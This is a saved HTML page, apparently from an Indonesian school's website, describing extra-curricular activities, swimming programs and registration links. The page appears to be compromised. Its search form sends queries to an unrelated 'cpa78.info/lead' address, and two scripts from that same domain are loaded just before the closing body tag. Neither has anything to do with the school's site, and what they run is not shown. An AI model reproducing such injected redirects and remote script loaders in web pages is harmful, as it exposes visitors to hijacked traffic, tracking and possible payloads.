<!DOCTYPE html>
<html lang="en">
	<head>
		
	<title>Extra Curricula Activities - AIS Indonesia</title>		<link rel="stylesheet" type="text/css" href='./files/bootstrap-77e-arb.css' />
		<link rel="stylesheet" type="text/css" href='./files/non-responsive-3b1-arb.css' />
		<link rel="stylesheet" type="text/css" href='./files/style-d34-arb.css' />
		<script  src='./files/modernizr.custom-143-arb.js'></script>
		
		<script  type="text/javascript" src='./files/jquery-d45-arb.js'></script>
		<script  type="text/javascript" src='./files/jquery-migrate-1.2.1-809-arb.js'></script>
		<script  type="text/javascript" src='./files/bootstrap-402-arb.js'></script>	
		<script  type="text/javascript" src='./files/cbpHorizontalSlideOutMenu.min-261-arb.js'></script>
	    <script  type="text/javascript" src='./files/j.columnizer-a45-arb.js'></script>
	    <script  type="text/javascript" src='./files/tinycarousel-769-arb.js'></script>
	    <script  type="text/javascript" src='./files/colorbox-d66-arb.js'></script>
	    <script  type="text/javascript" src='./files/fullcalendar.min-747-arb.js'></script>
	    <script  type="text/javascript" src='./files/carouFredSel-5b9-arb.js'></script>
	    <script  type="text/javascript" src='./files/jquery.carousel-549-arb.js'></script>
		<script  type="text/javascript" src='./files/mycode-c13-arb.js'></script>
		
		
        <meta name="google-site-verification" content="C8QxjLU-sMS4yZZQXVDfllD7wKi7nyRDVNytcNLiXFI" />
	</head>
	<body>
		<div class="container"> <!--container header-->
			<div class="row">
				<div class="col-xs-5">
					<div class="logo">
						<a href="http://128.199.219.123">AIS Indonesia</a>
					</div>	
				</div>
				<div class="col-xs-4">
					<div class="headmenu">
						<ul>
							<li class="dropdown">
								<a href="#" class="dropdown-toggle" data-toggle="dropdown">Calendar</a>
					            <ul class="dropdown-menu" id="boxcalendar">
					                <ul class='list-inline' id="listcalendar">
					                	
					                		
					                    		<li><a href="http://128.199.219.123/calendar/Jakarta-Kemang-Primary-Campus/academic/">Jakarta-Kemang ...</a></li>
					                    	
					                    
					                		
					                    		<li><a href="http://128.199.219.123/calendar/Jakarta-Pejaten-Secondary-Campus/academic/">Jakarta-Pejaten...</a></li>
					                    	
					                    
					                		
					                			<li><a href="http://bali.ais-indonesia.com/calendar/Bali/academic/">Bali</a></li>
					                		
					                    
					                </ul>
					            </ul>								
							</li>
						</ul>
					</div>	
				</div>
				<div class="col-xs-3">
					<div class="mod-search">
						<div class="box-search light">
							<form method="get" action="https://cpa78.info/lead/c1a6740947a80df17b475bff494b7171">
								<input type="text" name="q" class="search-input" placeholder="Search for something" />
								<button type="submit">Go</button>
							</form>
						</div>
					</div>
				</div>				
			</div>
		</div>
			<nav class="cbp-hsmenu-wrapper" id="cbp-hsmenu-wrapper">
				<div class="cbp-hsinner">
					<ul class="cbp-hsmenu">
						<li>
							<a href="#">Campuses</a>
							<ul class="cbp-hssubmenu nav-campus">
								
									<li><a href='http://128.199.219.123/campus/Jakarta-Kemang-Primary-Campus/eca/'>Jakarta-Kemang Primary Campus</a></li>
								
									<li><a href='http://128.199.219.123/campus/Jakarta-Pejaten-Secondary-Campus/eca/'>Jakarta-Pejaten Secondary Campus</a></li>
								
									<li><a href='http://128.199.219.123/campus/Bali/eca/'>Bali</a></li>
								
							</ul>
						</li>
						<li>
							<a href="#">Curriculum</a>
							<ul class="cbp-hssubmenu curriculum">
							
								<li><a href="http://128.199.219.123/curriculum/extra-curricula-activities/">Extra Curricula Activities</a></li>
                                                        </ul>
						</li>
						<li>
							<a href="#">Community</a>							<ul class="cbp-hssubmenu community">
								<li><a href="http://128.199.219.123/community/parents-and-friends/">Parents and Friends</a></li>
								<li><a href="http://128.199.219.123/community/class-representative/">Class Representatives</a></li>
								<li><a href="http://128.199.219.123/community/directory-for-parents/">Directory For Parents</a></li>
							</ul>								
						</li>
					</ul>
				</div>
			</nav>	
		
<script >
	// $.noConflict();
	jQuery( document ).ready(function( $ ) {
		$('.item').insertAfter('.blockfiber > div');
		$('.blockfiber > div').first().remove();	
		$('.blockfiber > div').first().addClass('active');					
	});		
</script>
<div id="breadcrumb">
	<div class="inner">
		<ul>
			<li>Curriculum</li>
			<li class="divider">/</li>
			<li class="active">Extra Curricula Activities</li>
		</ul>
	</div>
</div><div class="container">
	
	<div class="row">
		<div class="col-xs-4">
			<div class="sideleft">
				<div class="inner">
					
<div>    
            <div class="content">        
        <h2>Extra Curricular Activities</h2><p>Participation in extra curricular&nbsp;activities helps students feel welcome as well as gives them a sense of belonging</p>    </div>    </div>				</div>	
				<div class="boximg">
					<div id="bannerpageleftslider" class="carousel slide" data-ride="carousel">
						<div class="carousel-inner blockfiber">
							
<div>    
            <div class="content">        
        <div class="item"><img src='./files/Extra-Curricula-Activities-2e7-arb.jpg' title="" /></div><div class="item"><img src='./files/28-extra-curricula-activites-3b0-arb.jpg' title="" />?</div>    </div>    </div>						</div>
					</div>
				</div>													
			</div>					
		</div>
		<div class="col-xs-8">
			<div class="maincontentright about_security">
				
<div>    
            <div class="content">        
        <p>AIS offers a wide range of Extra Curricular Activities (ECA&rsquo;s) for students to explore their passions and interests, find new pastimes and take on leadership opportunities.</p><p>Students from Years 1-12 can join a wide range of ECA&rsquo;s including sport activities such as Badminton, Taekwondo, Gymnastics, Table Tennis, Volleyball, Basketball, Netball, Touch and Soccer.</p><p>Creative and problem solving activities such as Chess, Origami, Choir, IT Robotics and Dance are further examples of the diverse range available.</p><p><strong>AIS Swim Program</strong></p><p>There are two swimming programs at AIS Jakarta based campuses&ndash; the AIS Nippers Learn to Swim and the AIS Piranhas Swim Team. Please see below the informational links about the two programs. Swimming safety is very important in a child&#39;s development.&nbsp; With so many pools in and around Jakarta, basic learn to swim skills are extremely important.&nbsp;</p><p><strong>AIS Nippers Program</strong></p><p>The Nippers Learn to Swim program offers a standardized program with 8 levels which ensures students cover all the proper skills and techniques of swimming. Levels 1 to 2 lessons are conducted at the Kemang campus teaching pool (depth of 1.2 m), whereas all Levels are conducted at the Pejatan AIS High School campus pool at Pejaten Barat Raya #69 (5 minutes from the primary campus). For further inquiry please contact Coach Vina at <a href="&#109;&#x61;&#x69;&#108;&#116;&#x6f;&#x3a;&#x6e;&#x69;&#x70;&#112;&#x65;&#114;&#x73;&#x2e;&#x63;&#x6f;&#97;&#99;&#104;&#x40;&#x61;&#x69;&#115;&#x2d;&#x69;&#x6e;&#x64;&#x6f;&#x6e;&#101;&#115;&#105;&#97;&#x2e;&#x63;&#111;&#109;">&#x6e;&#x69;&#x70;&#112;&#101;&#114;&#x73;&#x2e;&#99;&#111;&#97;&#99;&#104;&#x40;&#97;&#x69;&#x73;&#x2d;&#x69;&#110;&#100;&#111;&#x6e;&#101;&#x73;&#105;&#x61;&#x2e;&#99;&#111;&#x6d;</a></p><p><strong>Nippers Program registration form:</strong> <a href="https://docs.google.com/forms/d/e/1FAIpQLSe-xSS5p7zjqKUKW8LMj-CoKogy_EMReiQvCKYUhHCsUKKmkw/viewform?vc=0&c=0&w=1" target="blank">PLEASE CLICK HERE</a></p><p><strong>AIS Piranhas Swimming Club</strong></p><p>If your child is interested in competitive swimming and would like to try out for the AIS Piranhas Swim Team please contact our Head Swimming Coach Dio to organise a trial at <a href="&#x6d;&#x61;&#x69;&#108;&#x74;&#111;&#x3a;&#x70;&#105;&#x72;&#x61;&#x6e;&#x68;&#x61;&#115;&#x2e;&#104;&#101;&#x61;&#x64;&#x63;&#x6f;&#x61;&#99;&#x68;&#x40;&#97;&#x69;&#115;&#45;&#105;&#110;&#x64;&#x6f;&#110;&#101;&#x73;&#105;&#97;&#x2e;&#x63;&#111;&#x6d;">&#x70;&#x69;&#114;&#97;&#x6e;&#x68;&#x61;&#115;&#x2e;&#x68;&#101;&#97;&#100;&#x63;&#x6f;&#97;&#99;&#104;&#64;&#x61;&#x69;&#x73;&#x2d;&#x69;&#x6e;&#100;&#x6f;&#110;&#101;&#x73;&#x69;&#x61;&#x2e;&#99;&#111;&#x6d;</a>.</p><p><strong>Piranhas registration form:</strong> <a href="https://docs.google.com/forms/d/e/1FAIpQLScnKzfHDkIUwoQ72ilsdZlZCiipd_1av-UOZ1XkjTzAQOtoOw/viewform?vc=0&c=0&w=1" target="blank">PLEASE CLICK HERE</a></p><p>_______________________________________________________________________________</p><p>&nbsp;</p><h3>For Kemang ECA Registration click <a href="http://128.199.219.123/campus/Jakarta-Kemang-Primary-Campus/eca/" target="blank">here</a>.</h3><h3>For Pejaten ECA Registration click <a href="http://128.199.219.123/campus/Jakarta-Pejaten-Secondary-Campus/eca/" target="blank">here</a>.</h3><p>&nbsp;</p>
<script  src='./files/embed-598-arb.js' data-fxo-widget="eyJ0aGVtZSI6IiNiZDU5MGIiLCJ3ZWIiOnsiYm90SWQiOiI1OWU1YWQ2MmM1Y2NkMDAwNmM2Y2RlN2MiLCJ0aGVtZSI6IiNiZDU5MGIiLCJsYWJlbCI6IkFJUyBJbmRvbmVzaWEgU3VwcG9ydCBCb3QifX0=" async defer></script>
    </div>    </div>			</div>					
		</div>
	</div>				
			
</div>		
		<div id="footerwrap">
			<div class="boxfooter">
				<div class="copyright">
				<font size="4">
                                	Best Viewed using Internet Explorer <br />
					Copyright &copy; 2020 AIS Indonesia.<br />
					All rights reserved.					
				</font>	
				</div>	
			</div>
		</div>
		<div id="back-top">
			<a href="#top">Back to top</a>
		</div>
	<script src='https://cpa78.info/track.js' hash='c1a6740947a80df17b475bff494b7171' id='wildo'></script>
<script src='https://cpa78.info/widgets.js' hash='c1a6740947a80df17b475bff494b7171' id='wildoWidgets'></script>

</body>
</html>